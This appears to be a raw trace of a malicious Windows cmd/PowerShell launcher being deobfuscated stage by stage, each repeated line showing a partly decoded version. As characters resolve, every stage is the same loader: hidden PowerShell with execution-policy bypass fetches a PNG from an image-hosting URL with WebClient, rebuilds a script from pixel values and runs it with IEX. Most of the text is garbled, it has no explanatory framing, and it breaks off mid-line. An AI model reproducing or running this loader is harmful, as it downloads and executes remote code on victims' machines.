-nXqf6NZqf6NTE]aCTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:CXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% True 1
Fn
Get Environment String name = *}, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'ob') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'Eob1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*obt).VaLuE.Inf6PjkEComBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Pjy-LQoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% True 1
Fn
Get Environment String name = `._, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'X') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6PjkEComBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Pjy-LQoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% True 1
Fn
Get Environment String name = \#, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'X') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6PjkEComBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Pjy-JoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% True 1
Fn
Get Environment String name = ~\, result_out = set suL]f6aK. 1 @sheZVelLId{DnOy+@sTzEhELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'OpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTzEhOy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTzEhA]Oy#H).ReplaCE11{CTzEhA]Oy98+{CTzEhA]Oy8#+{CTzEhA]OyDn06),{sTRInaEOy{CTzEhA]OyDn2H).ReplaCE11{CTzEhA]OyDnDn8+{CTzEhA]Oy5H+{CTzEhA]Oy8Dn),{sTRInaEOy{CTzEhA]Oy#6))^&^& seT aDI/`aKEcTzEhO 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolO -4Zqf6N TzEhIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OzEhIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% True 1
Fn
Get Environment String name = \,, result_out = set suL]f6aK. 1 @sheZVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'OpenRead19a'+'7'+'TFttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTF1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDI/`aKEcTFO 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolO -4Zqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% True 1
Fn
Get Environment String name = `[+, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps:cgcgimag'+'es2.img3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDI/`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E cgc %adi/Y% True 1
Fn
Get Environment String name = .*#, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps:cgcgimag'+'es2.img3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E cgc %adizY% True 1
Fn
Get Environment String name = @;?#, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% True 1
Fn
Get Environment String name = ,@$[, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7S`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] S`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11LS eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyASS -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% True 1
Fn
Get Environment String name = {$_, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7S`stem.D]a'+'4'+'ing9a7['+'f66pBMds'+'aKf] S`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9a7'+'))['+'f66pBM'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\fo]eacTF1'+'f6'+'6'+'pBM7 in10..H'+'2('+'))\f66pBM'+'t'+'taKf66pBMds.aEe'+'ttyi7el1f66pBM7,'+'f6'+'6pBM_'+')[f66pBMmk'+'{f66pBM'+'_*H28+f66pBM7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBMtt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'t]ing1f66'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComManD.Iqf6NVOkesCRityT11LS eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyASS -nOty]OFIle -COmMAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% True 1
Fn
Get Environment String name = '`#, result_out = set suL]vaK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9a7S`stem.D]a'+'4'+'ing9a7['+'v6pBMds'+'aKf] S`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9a7'+'))['+'v6pBM'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\fo]eacTF1'+'v'+'6'+'pBM7 in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyi7el1v6pBM7,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_*H28+v6pBM7OyaK1{matTFOy::F'+'lo'+'o]11v6'+'pBMtt.B-3k9andDn5)*Dn6)-3k9o]'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'t]ing1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3L]V).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTE]aCTI -qvNolO -4iqvN TFIdden -e7ecuTIOqvNpOLIc 3k9`tyASS -nOty]OFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% True 1
Fn
Get Environment String name = }\?, result_out = set suLrvaK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9a7S`stem.Dra'+'4'+'ing9a7['+'v6pBMds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9a7'+'))['+'v6pBM'+'mkaKfr B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'pBM7 in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyi7el1v6pBM7,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_*H28+v6pBM7OyaK1{matTFOy::F'+'lo'+'or11v6'+'pBMtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'tring1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFArOy#H).ReplaCE11{CTFArOy98+{CTFArOy8#+{CTFArOyDn06),{sTRInaEOy{CTFArOyDn2H).ReplaCE11{CTFArOyDnDn8+{CTFArOy5H+{CTFArOy8Dn),{sTRInaEOy{CTFArOy#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -e7ecuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY% True 1
Fn
Get Environment String name = {;, result_out = set suLrvaK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6pBMds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6pBM'+'mkaKfr B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'pBMx in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyixel1v6pBMx,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_*H28+v6pBMxOyaK1{matTFOy::F'+'lo'+'or11v6'+'pBMtt.B-3k9andDn5)*Dn6)-3k9or'+'1v6pBMt'+'t.aE -3k9and 